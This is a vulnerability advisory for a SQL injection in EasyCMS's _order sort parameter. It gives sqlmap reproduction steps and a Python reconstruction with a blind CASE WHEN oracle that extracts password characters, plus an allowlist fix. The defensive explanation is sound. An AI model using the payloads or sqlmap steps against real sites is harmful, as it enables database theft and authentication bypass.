EasyCMS
cpe:2.3:a:easycms:easycms:*:*:*:*:*:*:*
- <= 1.6
A SQL injection vulnerability has been identified in EasyCMS up to and including version 1.6 (the version range recorded above). The flaw is in the file RbacuserAction.class.php, part of the Request Parameter Handler component: the _order request parameter is used to build a database query without being validated or sanitized, so an attacker can inject SQL through it. The parameter name indicates a sort expression, a position in a query (the ORDER BY clause) where bound parameters cannot be used, which is why the value must be checked against an allowlist of permitted column names and sort directions rather than escaped. The issue is exploitable remotely, has been publicly disclosed, and is reported as being exploited.
Successful exploitation gives an attacker blind SQL injection against the application's database, which the page also reports can be used to bypass authentication and to alter stored data. Read access to the user tables exposes password hashes and personal information. Whether the injection escalates from data access to command execution on the server depends on the privileges of the database account the application uses and on the DBMS configuration (for example, file-write privileges); where those permit it, the outcome is a complete server compromise.
To reproduce, open the backend user management page of an EasyCMS installation at version 1.6 or earlier with an account that can reach that page (the reproduction path goes through the backend, so the attacker needs whatever access the backend grants). Click the 'Refresh' button; the request it issues carries the _order parameter. Because the application does not validate this value, it can be replaced with a SQL payload. To confirm the injection, capture that request and hand it to sqlmap with _order as the target parameter (for example, `sqlmap -r request.txt -p _order`); sqlmap will demonstrate the flaw by enumerating the database or extracting its contents through the injected sort expression.
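The following is an added example written for this page, not code from EasyCMS or from the original advisory. It reconstructs the flaw class in a language-neutral form with Python and an in-memory SQLite database: a constructed `rbac_user` table (assumed name and columns, not taken from EasyCMS), a vulnerable listing function that concatenates a client-supplied `_order` value into ORDER BY, a boolean-based blind oracle of the kind sqlmap automates, a demonstration that merely binding the sort key as a placeholder is not a fix, and an allowlist parser that is. The SQLite `substr` function stands in for the DBMS-specific functions a real payload would use.

```python
import re
import sqlite3

# Constructed sample data, not EasyCMS data. Passwords are stand-in hash strings.
SAMPLE_USERS = [
    (1, "root", "9b8a6c1d3f2e4a5b"),
    (2, "alice", "4e3d2c1b0a9f8e7d"),
    (3, "mallory", "c0ffee0123456789"),
]


def make_db():
    """Build the constructed rbac_user table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rbac_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO rbac_user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(conn, order):
    """Mirror of the flaw class: the client-controlled _order value goes straight into ORDER BY."""
    sql = f"SELECT id, username FROM rbac_user ORDER BY {order}"
    return [row[1] for row in conn.execute(sql)]


def password_char_oracle(conn, user_id, position, guess):
    """Boolean-based blind probe: the sort key switches between id and username
    depending on whether the guessed character is correct, so the row order
    itself leaks one bit. This is the mechanism sqlmap automates."""
    payload = (
        f"(CASE WHEN (SELECT substr(password,{position},1) FROM rbac_user WHERE id={user_id})"
        f"='{guess}' THEN id ELSE username END)"
    )
    return list_users_vulnerable(conn, payload) == list_users_vulnerable(conn, "id")


def extract_password_prefix(conn, user_id, length, alphabet="0123456789abcdef"):
    """Recover the first `length` characters of a stored password one bit at a time."""
    recovered = ""
    for position in range(1, length + 1):
        for c in alphabet:
            if password_char_oracle(conn, user_id, position, c):
                recovered += c
                break
        else:
            break  # character outside the alphabet; stop rather than guess
    return recovered


def list_users_bound(conn, order):
    """Not a fix: a bound parameter in ORDER BY is a string constant, so every row
    compares equal and the requested column is ignored."""
    rows = conn.execute("SELECT id, username FROM rbac_user ORDER BY ?", (order,))
    return [row[1] for row in rows]


# The fix: identifiers cannot be bound, so validate against an allowlist.
ALLOWED_COLUMNS = {"id", "username"}
ORDER_RE = re.compile(r"([A-Za-z_]\w*)(?:\s+(asc|desc))?", re.IGNORECASE)


def parse_order(order):
    """Return (column, direction) for an allowlisted sort spec, else raise ValueError."""
    m = ORDER_RE.fullmatch(order.strip())
    if not m or m.group(1).lower() not in ALLOWED_COLUMNS:
        raise ValueError(f"rejected _order value: {order!r}")
    return m.group(1).lower(), (m.group(2) or "asc").upper()


def is_safe_order(order):
    try:
        parse_order(order)
        return True
    except ValueError:
        return False


def list_users_fixed(conn, order):
    """Only allowlisted column names and directions ever reach the query text."""
    column, direction = parse_order(order)
    sql = f"SELECT id, username FROM rbac_user ORDER BY {column} {direction}"
    return [row[1] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("by id:      ", list_users_vulnerable(db, "id"))
    print("by username:", list_users_vulnerable(db, "username"))
    print("leaked prefix of root's password:", extract_password_prefix(db, 1, 4))
    print("safe 'username desc':", is_safe_order("username desc"))
    print("safe CASE payload:   ", is_safe_order("(CASE WHEN 1=1 THEN id ELSE username END)"))
```

The oracle needs no error messages and no timing: two orderings that differ for a known base query are enough, which is why ORDER BY injection stays exploitable even when the application suppresses database errors. The allowlist parser accepts only a bare identifier with an optional direction and then re-emits canonical text, so nothing the client sent is copied into the query.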